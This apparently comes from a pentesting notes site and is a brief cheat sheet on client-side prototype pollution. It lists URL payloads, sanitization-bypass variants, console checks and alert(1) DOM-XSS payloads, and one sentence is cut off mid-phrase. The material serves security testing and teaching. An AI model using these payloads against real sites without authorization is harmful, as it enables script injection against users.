Prototype Pollution in Client-Side
Last modified: 2023-04-10
Check if we can assign arbitrary property via URL.
Try various ways.
https://example.com/?__proto__[foo]=bar https://example.com/?__proto__.foo=bar https://example.com/?constructor.[prototype][foo]=bar https://example.com/?constructor.prototype.foo=bar # Bypass sanitization https://example.com/?__pro__proto__to__[foo]=bar https://example.com/?__pro__proto__to__.foo=bar https://example.com/?constconstructorructor[prototype][foo]=bar https://example.com/?constconstructorructor.prototype.foo=bar https://example.com/?constconstructorructor[protoprototypetype][foo]=bar https://example.com/?constconstructorructor.protoprototypetype.foo=bar
Open browser console, and type the following to check if our above property is assigned.
Object.prototype.foo constructor.prototype.foo // the expected output: "bar"
If our payload affects an HTML element after loading, we can inject DOM-based XSS as below.
Assume the key name of the property is "source_url", whose value is loaded as "src" in a
https://example.com/?__proto__[source_url]=data:,alert(1); https://example.com/?__proto__[source_url]=data:,alert(1); https://example.com/?__proto__[source_url]=alert(1)-
- When found the line of the code, click the line number at the left of the line to add a breakpoint. Then reload the page.
- The line that added as a breakpoint is highlighted. We can hover the target property to check the current value assigned.
- Adjust for executing our payload while checking the property's value.